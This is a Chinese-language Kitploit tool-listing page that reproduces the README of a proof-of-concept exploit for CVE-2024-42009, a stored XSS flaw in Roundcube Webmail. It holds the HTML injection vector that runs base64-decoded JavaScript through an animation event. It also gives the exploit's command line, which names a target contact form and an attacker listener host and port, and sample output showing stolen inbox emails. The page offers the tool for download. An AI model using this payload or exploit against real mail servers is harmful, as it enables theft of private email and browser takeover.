Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-42009-PoC — CVE-2024-42009 概念验证 | Kitploit
工具/GitHubGitHub/danithehack3r/cve-2024-42009-poc
钓鱼工具漏洞利用Web应用程序漏洞利用数据泄露学习与教育电子邮件安全
GitHubdanithehack3r/cve-2024-42009-poc

CVE-2024-42009-PoC

CVE-2024-42009 概念验证

查看仓库
71481年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-42009 PoC:Roundcube Webmail 中的邮件捕获监听器与XSS漏洞利用

概述

本仓库包含针对 CVE-2024-42009 的概念验证(PoC)利用代码,该漏洞是 Roundcube Webmail 1.6.7 及其他多个版本中的一个存储型跨站脚本(XSS)漏洞。该利用代码演示了攻击者如何在邮件中注入恶意 JavaScript,并利用解析邮件内 HTML 时的反净化问题,进而在本例中窃取受害者收件箱中的邮件内容,甚至控制受害者的浏览器。

漏洞详情

CVE 描述

Roundcube 1.5.7 及之前版本、1.6.x 至 1.6.7 版本中存在一个跨站脚本漏洞,远程攻击者可通过精心构造的电子邮件消息,利用 program/actions/mail/show.php 中 message_body() 函数的反净化问题,窃取并发送受害者的电子邮件。

XSS 有效载荷说明(本例)

该利用代码使用 CSS 动画触发器来执行 XSS:

root@kitploit:~
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('BASE64_PAYLOAD')) foo=bar>

body 元素会被解析为 div,因此我们需要适应这一点,这就是为什么我们使用 onanimationstart 属性来调用 eval 函数并执行其中的复杂 JavaScript 调用。如需进一步了解如何利用该漏洞以及 Roundcube 中的漏洞位置,请阅读此文章。

影响范围

  • 该利用代码仅针对 Roundcube Webmail 1.6.7 版本进行了测试
  • 受害者必须打开邮件才能查看其内容
  • 如果内容安全策略(CSP)配置得当,可能会失败

使用方法

依赖项

安装所需的 Python 包:

root@kitploit:~
python3 -m venv venv
python3 -m pip install -r requirements

命令行参数

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r <RECIPIENT_EMAIL> -l <LISTENER_HOST> -p <LISTENER_PORT>
  • 目标 URL:本例中使用的是处理消息并将其转发的联系表单端点(例如 http://email.company.local/contact)
  • 收件人邮箱:将接收恶意邮件的有效电子邮件地址
  • 监听主机:目标可访问的本机 IP 地址
  • 监听端口:HTTP 服务器可用的端口(例如 4444)

使用示例

root@kitploit:~
python3 exploit.py -u http://webmail.target.com/contact -r [email protected] -l 192.168.1.100 -p 4444

预期输出

root@kitploit:~
[*] Crafting payload for http://webmail.target.com/contact with recipient [email protected]
[*] Sending payload to http://webmail.target.com/contact with recipient [email protected]  
[*] Starting HTTP server on port 4444
[+] HTTP server listening on port 4444
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[+] Received 3 emails!

------------------------------------------------------------
📧 EMAIL UID: 1  
------------------------------------------------------------
From: [email protected]
Subject: Quarterly Report
Message:
Please find attached the quarterly financial report...
------------------------------------------------------------

[+] Email exfiltration complete! Shutting down server...
[+] Server stopped successfully!

参考信息

漏洞研究

  • SonarSource Blog:处于风险中的政府邮件——Roundcube Webmail 中的严重跨站脚本漏洞
  • SonarSource 演示视频

法律免责声明

⚠️ 重要:本概念验证代码仅用于教育和授权测试目的。请负责任地使用,本账户不对他人造成的任何损害负责。

下载工具